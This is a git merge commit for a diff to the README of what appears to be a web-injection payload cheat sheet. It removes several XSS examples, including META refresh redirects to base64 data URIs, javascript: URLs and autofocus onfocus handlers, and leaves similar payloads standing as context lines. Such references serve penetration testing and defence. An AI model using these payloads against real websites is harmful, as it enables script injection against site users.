Merge pull request #40 from Bo0oM/patch-1

Fix fake xss
2024-12-20 03:16:10 +00:00 · 2019-02-11 10:05:31 +01:00 · 2019-02-11 10:05:31 +01:00 · bb0177916d
commit bb0177916d
parent f2273f5cce 200a2d38d8
1 changed files with 0 additions and 18 deletions
--- a/injection/README.md
+++ b/injection/README.md
@ -122,18 +122,6 @@ you can also specify an arbitratry payload with 14.rs/#payload
 e.g: 14.rs/#alert(document.domain)
 ```
 XSS in META tag
 ```javascript
 Base64 encoded
 <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
 <meta/content="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMzM3KTwvc2NyaXB0Pg=="http-equiv=refresh>
 With an additional URL
 <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
 ```
 XSS in Hidden input
 ```javascript
@ -162,12 +150,6 @@ URL/<script>alert('XSS');//
 URL/<input autofocus onfocus=alert(1)>
 ```
 XSS using base64 encoded href data in a link
 ```
 <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk7PC9zY3JpcHQ+" target="_blank">here</a>
 ```
 ## XSS in wrappers javascript and data URI
 XSS with javascript: